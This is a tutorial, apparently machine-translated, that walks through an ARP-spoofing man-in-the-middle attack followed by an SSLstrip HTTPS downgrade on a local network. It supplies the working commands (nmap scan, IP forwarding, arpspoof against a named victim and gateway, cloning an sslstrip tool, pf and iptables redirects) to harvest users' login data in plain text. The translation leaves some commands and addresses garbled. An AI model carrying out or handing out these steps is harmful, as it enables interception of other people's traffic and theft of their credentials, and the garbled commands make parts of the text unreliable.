Introduction to the

This article describes how to listen to victim traffic and obtain sensitive information through SSLstrip attack in a LAN. It is divided into the following two steps:

  1. Man-in-the-middle attack, listening for victim traffic
  2. SSLStrip attack to obtain sensitive information

Man-in-the-middle attack

In a man-in-the-middle attack, an attacker acts as a middleman, hijacking a session and stealing credentials and other confidential information.

ARP (Address Resolution Protocol)

The ARP protocol is responsible for finding MAC addresses (physical addresses) from IP addresses. In Ethernet, MAC addresses are used for communication.

Here’s how ARP works: For example, host B needs to send data to host A (whose IP address is 192.168.1.100). In order to know who is host A, host B sends A broadcast packet to all the hosts on the network whose IP address is 192.168.1.10. Normally, other hosts ignore this message and host A replies with “I am 192.168.1.10”. Then correspondence can begin. All hosts maintain their own ARP cache tables, which contain THE MAC addresses of the IP addresses, so they do not broadcast every time.

Attack to prepare

Under the MAC to
  1. Install the macports official website
  2. Update the macportssudo port -d selfupdate
  3. Installing Dsniffing (Tools including ARP attacks)sudo port install dsniff
  4. Installed nmapbrew install nmap(If you don’t have Homebrew installed, goHomebrew website
Linux under preparation
  1. Install dsniffsudo apt-get install dsniff
  2. Installed nmapsudo apt-get install nmap

Attack steps

1. Find a target

Run the nmap command to scan the LAN and obtain the host list. If the ROUTER address of the LAN is 192.168.16.1, run the nmap-sp 192.168.16.1/24 command to scan the LAN

-sP indicates that the ping mode is used. 192.168.16.1/24 indicates that the ping mode is used to scan all the machines in the network segment 192.168.16.1-192.168.16.254.

2. Enable IP forwarding

ARP spoofing is intended to disguise itself as a gateway. However, if the spoofing packet arrives, it will be discarded by the host (because the host is not a gateway and does not know how to process such packets), which is not allowed. To solve this problem, enable THE IP forwarding function. IP forwarding is responsible for forwarding such packets to the real gateway

MAC:

sysctl -w net.inet.ip.forwarding=1

Linux under:

echo1 >/proc/sys/net/ipv4/ip_forward

ARP spoofing

Assume that the attacked IP address is 192.168.16.134, the GATEWAY of the LAN is 192.168.16.1, and the nic interface used by the attacked PC is EN0 (you can run the ifconfig command to view the IP address), then the spoofing command is as follows:

Arpspoof -i en0 -t 192.168.16.134 192.168.16.1

4. Analyze data

If the ARP spoofing succeeds, the attacked device sends all data to our computer, and then wireshark can be used to analyze the data.

At this point, the man-in-the-middle attack is complete, and the SSLstrip attack can begin.

SSLStrip attack

SSLstrip is also called HTTPS degrade attack. An attacker intercepts user traffic and tricks the user into communicating with the attacker through HTTP. The attacker communicates with the server normally (HTTP or HTTPS) to obtain user information.

Attack principle

  1. Listen for HTTP traffic through a man-in-the-middle attack (try it yourself by setting up an HTTP proxy)
  2. Change location in the redirected link, replace HTTPS with HTTP, and record
  3. Change the hyperlink in the response content, replace HTTPS with HTTP, and record
  4. HTTP communication with the user, HTTPS communication with the server (in the record should be HTTPS requests), so as to obtain user information in plain text

Attack to prepare

  1. Listening for HTTP Traffic
  2. Get attack codegit clone [email protected]:zsky/sslstrip.git
  3. Install nodeJs

Attack steps

First, run the program

Go to the root directory of the SSLStrip program and type the command node index.js to see the port number that the program listens on, such as 8080

Import traffic into the SSLStrip program

Under MAC (Changing the PACKET filter of THE MAC address) :

  1. You need to create a new file HTTP under /etc/pf.anchors, RDR pass on en0 proto TCP from any to any port 80 -> 127.0.0.1 port 8080 RDR pass on en0 proto TCP from any to any port 80 -> 127.0.0.1 port 8080

  2. Modify the /etc/pf.conf file, Add the rdr-anchor “http-forwarding” and load anchor “http-forwarding” from “/etc/pf.anchors/ HTTP “two lines in place.

    For example, /etc/pf.conf might look like this:

     #
 # com.apple anchor point
 #
 scrub-anchor "com.apple/*"
 nat-anchor "com.apple/*"
 rdr-anchor "com.apple/*"
 rdr-anchor "http-forwarding"
 dummynet-anchor "com.apple/*"
 anchor "com.apple/*"
 load anchor "com.apple" from "/etc/pf.anchors/com.apple"
 load anchor "http-forwarding" from "/etc/pf.anchors/http"Copy the code

  3. Restart the packet filter. Run the sudo PFCTL -ef /etc/pf.conf and sudo PFCTL -e commands in sequence

In Linux (modifying the IP forwarding table), run the following command: Iptables -t NAT -a PREROUTING -p TCP –destination-port 80 -j REDIRECT –to-port 8080 Where the last port number (such as 8080) is SSLStrip The port number on which the program listens

To delete this record after the attack is complete, run the iptables -t NAT -d PREROUTING 1 command to view the IP forwarding table: iptables -t NAT -l

Observe the SSLStrip program console

The listening data is then passed through the SSLStrip program, which by default prints the body of a POST request (such as a login request) that should be HTTPS to the console